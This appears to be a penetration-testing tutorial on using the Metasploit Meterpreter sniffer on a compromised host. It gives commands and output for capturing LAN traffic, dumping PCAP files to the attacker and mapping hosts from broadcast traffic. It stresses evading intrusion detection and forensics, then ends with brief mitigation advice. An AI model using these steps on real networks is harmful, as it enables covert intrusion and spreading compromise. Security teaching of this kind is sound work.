One of the techniques that can be used is passive network reconnaissance, i.e. packet sniffing to "listen" to the victim's LAN for interesting traffic. Here we explore how to use a sniffer such as the Metasploit Meterpreter sniffer extension.
Broadcast traffic
Several protocols broadcast interesting traffic, and capturing internal LAN traffic can be very useful to an external attacker, to assist in information gathering and in compromising further systems in the "soft underbelly" of the internal LAN.
You can find out a lot about a network by running a network packet sniffer such as Wireshark, tshark or tcpdump. However, an external attacker will likely want to keep a low profile, so installing an application where none existed previously is not a wise idea.
Using the Metasploit Meterpreter sniffer extension means that no additional software is installed and no files are written to disk; everything is stored in memory, and all communications between the attacker and the victim are encrypted. (This makes intrusion detection and forensic analysis rather difficult!)
Let's take it as read that the initial host has already been compromised, and pick up from there. We can load the Meterpreter sniffer extension as follows:
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > help
<......>
Sniffer Commands
================
Command             Description
-------             -----------
sniffer_dump        Retrieve captured packet data to PCAP file
sniffer_interfaces  Enumerate all sniffable network interfaces
sniffer_start       Start packet capture on a specific interface
sniffer_stats       View statistics of an active capture
sniffer_stop        Stop packet capture on a specific interface
...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself), and we go ahead and start the sniffer on the first interface:
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
During the capture, we can check the progress of the collection by issuing a sniffer_stats command:
meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
bytes: 32178
packets: 211
...and then dump some traffic:
meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
/root
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap
So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, to see if there is any data there also:
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap
Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap capture files, we can examine them locally at our leisure on the attacker system. This can be done with a graphical tool such as Wireshark, to filter the traffic and see what we can learn about the remote victim network.
Here we filter NetBIOS/SMB broadcast traffic to see what systems are visible on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN).
Other filters can be applied to other broadcast traffic, such as address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services such as file and print.
Using these methods, we can gather a list of live IP addresses, address ranges and machine types, and all of this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.
Mitigation
Once a single system is compromised, it is only a matter of a short amount of time before an attacker can gather enough local information to "pivot" and extend the attack to other local systems.
In secure environments, it is vitally important that every host is secured. This includes virtual hosts and test systems, as these could also be used as a bridgehead to silently sniff, or attack, other systems on the internal LAN.
It is also important that there is sufficient network segmentation, internal firewalling and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.